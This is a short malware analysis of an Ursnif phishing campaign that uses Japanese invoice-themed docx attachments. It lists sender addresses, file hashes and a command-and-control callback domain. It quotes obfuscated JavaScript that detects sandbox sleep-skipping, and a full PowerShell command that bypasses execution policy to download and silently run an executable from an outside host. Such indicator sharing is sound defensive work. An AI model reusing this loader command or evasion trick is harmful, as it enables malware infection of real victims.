Malware Delivery Method
docx attachment in email
Execution process
attached docx opened -> embedded JavaScript executes -> powershell runs the script and communicates with internet -> downloads payload over HTTPS
Example:
Document sent as an attachment in the following email:
Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?= From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]> To: <[email protected]> Original attachment name: 原価請求書です277253.docx ("copy of Invoice" when translated) MD5 hash: 85d09006634ab5f2138ac927997accda
Below are the unique sender email addresses observed in the Ursnif campaign which are sending the malicious Documents as email attachments:
[email protected] [email protected] [email protected]
And below are the spoofed addresses:
[email protected] [email protected] [email protected]
Embedded JavaScript in the docx performs the following tasks:
- Detects Sleep Short Circuiting by checking the time difference between time-stamps before and after Sleep function is invoked.
piUCkfeTbuHWBQdaRl=”getS”+”ec”+”onds”;
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
WScript.Sleep(1000);
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();
- If Sleep Short Circuiting is not detected then JavaScript will execute Powershell to download the malicious payload over HTTPS as shown below:
lhzYcTRDtUorLVmdP.ShellExecute(“cmd.eXE”, “/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘https://aedwards.co/wp-includes/IXR/get.php?jgTbz’,’%appdata%xJr23.eXe’); sTarT-PROcess ‘%appdAta%xJr23.exe'”, “”, “open”, 0);
MD5 hash of the downloaded payload:
c0b7897f69f0a68297969c709cac576d
Downloaded payload will perform the following Network Callback post execution:
antispam.city/images/Ncd0ce3MW_2Br1/2xSMfrx83BhD9VwVpJlrz/Vcj4Y3fgOgnnRFQY/b5MMsaAEnTYFOQb/9smbf8JBZRu4uT2DPA/m3IUcDt7p/eRM513X067tKgbFbFUAP/CgywchBtV2v2M3vHdCF/Pye9qtR5e88uvj4d5msIyY/XHeVYOb9Z5pcC/GutfKuT3/w_2Bd1EzlOjZGmrVBuR7_2F/waO8u_2BBp/YC_2FNg9W/K92jQnG.jpeg
Interesting callback domain name:
antispam.city (how ironic)
Whois info shows that this domain was recently registered on 14th August 2017.
Ref:
https://www.virustotal.com/#/file/f05f940d70b4a90908e3f0517cf581ed9d83264548577393464f781f24882cd5/detection